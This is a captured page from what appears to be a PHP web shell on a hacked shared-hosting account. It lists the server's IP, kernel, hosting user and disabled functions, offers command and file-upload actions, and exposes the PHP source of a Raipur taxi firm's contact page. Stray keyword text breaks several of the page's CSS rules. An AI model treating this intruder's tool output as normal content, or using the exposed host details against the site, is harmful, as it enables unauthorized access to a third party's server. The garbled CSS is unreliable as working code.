|
Server IP : 217.21.91.233 / Your IP : 216.73.216.58 Web Server : LiteSpeed System : Linux in-mum-web832.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u952924200 ( 952924200) PHP Version : 8.2.27 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : ON Directory (0755) : /home/u952924200/domains/nadeemtravels.in/public_html/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html>
<html lang="en">
<head>
<?php
require_once __DIR__ . "/include/common_begin_head.php";
require_once __DIR__ . "/include/connection.php";
?>
<title>Contact Us | Nadeem Travels</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="UTF-8" />
<meta name="keywords" content="taxi service in raipur, cab booking service in raipur, travel agency in raipur, car rental service in raipur" />
<link rel="icon" type="image/png" href="<?= ROOT ?>images/favicon.png">
<link rel="canonical" href="https://www.nadeemtravels.in/contact" />
<link rel="stylesheet" href="css/bootstrap.css">
<link rel="stylesheet" href="<?= ROOT ?>css/style.css" type="text/css" media="all" />
<link rel="stylesheet" href="<?= ROOT ?>css/fontawesome-all.css">
<style>
.btn-default {
color: #fff;
background-color: #ee4f4f;
border-color: #ee4f4f;
}
.basic-padding {
padding-top: 15px;
padding-bottom: 15px;
}
.image-hover {
background: -webkit-linear-gradient(45deg, #ff89e9 0, #05abe0 100%);
background: linear-gradient(45deg, #ff89e9 0, #05abe0 100%);
position: relative;
width: 100%;
height: 100%;
overflow: hidden;
}
.image-hover .overlay {
width: 100%;
height: 100%;
overflow: hidden;
position: absolute;
top: 0;
left: 0;
padding: 40px;
text-align: left;
}
.image-hover .overlay::before {
content: '';
-webkit-transition: opacity 0.35s, -webkit-transform 0.45s;
position: absolute;
top: 20px;
right: 20px;
bottom: 20px;
left: 20px;
border: 1px solid #fff;
opacity: 0;
transition: opacity .35s, transform .45s;
-webkit-transform: translate3d(-20px, 0, 0);
transform: translate3d(-20px, 0, 0);
}
.image-hover img {
-webkit-transition: opacity 0.35s, -webkit-transform 0.45s;
max-width: none;
transition: opacity .35s, transform .45s;
-webkit-transform: translate3d(-40px, 0, 0);
transform: translate3d(-40px, 0, 0);
}
.image-hover h2 {
padding: 130px 0px 0px 0px;
color: #fff;
position: relative;
font-size: 17px;
text-transform: uppercase;
}
best taxi service in raipur .image-hover .btn-hover {
display: inline-block;
best taxi service in raipur color: #fff;
opacity: 0;
margin: 0;
padding: 0;
border: none;
-webkit-transition: opacity 0.35s, -webkit-transform 0.45s;
transition: opacity .35s, transform .45s;
-webkit-transform: translate3d(-10px, 0, 0);
transform: translate3d(-10px, 0, 0);
}
.image-hover:hover img {
opacity: .6;
-webkit-transform: translate3d(0px, 0, 0);
transform: translate3d(0px, 0, 0);
}
.image-hover:hover .overlay::before {
opacity: 1;
-webkit-transform: translate3d(0, 0, 0);
transform: translate3d(0, 0, 0);
}
.image-hover:hover .btn-hover {
opacity: 1;
-webkit-transform: translate3d(0, 0, 0);
transform: translate3d(0, 0, 0);
}
.navbar-light .navbar-nav .nav-link {
font-size: 14px;
}
a.login-button {
font-size: 14px;
}
</style>
<?php
require_once __DIR__ . "/include/common_end_head.php";
?>
</head>
<body>
<?php
include 'menu.php';
?>
<!-- banner -->
<div class="inner-banner-w3ls">
<div class="container">
</div>
<!-- //banner 2 -->
</div>
<!-- //banner -->
<div class="clearfix"></div>
<!-- banner bottom -->
<div class="breadcrumb-agile">
<div aria-label="breadcrumb">
<ol class="breadcrumb">
<li class="breadcrumb-item">
<a href="<?= ROOT ?>">Home</a>
</li>
<li class="breadcrumb-item active" aria-current="page">Contact Us</li>
</ol>
</div>
</div>
<h1 style="text-align:center;">Contact Us</h1>
<div class="container" style="padding:70px 10px;">
<div class="row">
<div class="col-md-6">
<div>
<iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3719.5581490012437!2d81.6366853!3d21.2097046!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3a28dd4881581c2d%3A0xdd87aeb9b82a710!2sNadeem%20Travels%20-%20Taxi%20Service%20in%20Raipur%2F%20Car%20Rental%20in%20Raipur%2F%20Raipur%20Taxi%20Service%2F%20One%20Way%20Taxi!5e0!3m2!1sen!2sin!4v1766380418731!5m2!1sen!2sin" width="600" height="500" style="border:0;" allowfullscreen="" loading="lazy" referrerpolicy="no-referrer-when-downgrade"></iframe>
</div>
</div>
<div class="col-md-6">
<div>
<div class="row">
<div class="col-md-12" style="background-color: #ac0e0e;padding: 50px 50px;">
<div>
<form action="<?= ROOT ?>from-handler.php" method="post">
<div class="form-group">
<label for="name" class="text-left">Name</label>
<input required name="name" type="text" class="form-control" id="name">
</div>
<div class="form-group">
<label for="mobile" class="text-left">Mobile No:</label>
<input required name="mobile" type="text" class="form-control" id="mobile">
</div>
<div class="form-group">
<label for="email" class="text-left">Email</label>
<input required name="email" type="text" class="form-control" id="Email">
</div>
<div class="form-group">
<label for="message" class="text-left">Message </label>
<textarea required name="message" type="text" class="form-control" id="message"></textarea>
</div>
<div>
<button type="submit" class="bg-dark btn btn-dark d-block text-white" name="submitForm">Submit</button>
</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<?php
require_once __DIR__ . "/include/common/service-card-design.php";
?>
<?php
include 'footer.php';
?>